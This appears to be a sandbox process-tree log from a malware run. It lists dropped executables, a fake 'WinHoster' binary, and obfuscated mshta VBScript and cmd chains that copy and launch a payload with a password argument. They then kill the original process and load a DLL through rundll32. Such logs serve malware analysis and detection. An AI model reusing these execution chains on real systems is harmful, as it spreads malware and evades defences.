853147.exe "C:\ProgramData\853147.exe"
2492WinHoster.exe "C:\Users\test22\AppData\Roaming\WinHost\WinHoster.exe"
2144mshta.exe "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4446173.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4446173.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
1304cmd.exe "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F
260mshta.exe "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
2656cmd.exe "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
1420rundll32.exe "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
2664taskkill.exe taskkill -Im "4446173.exe" /F
10402185135.exe "C:\ProgramData\2185135.exe"
2092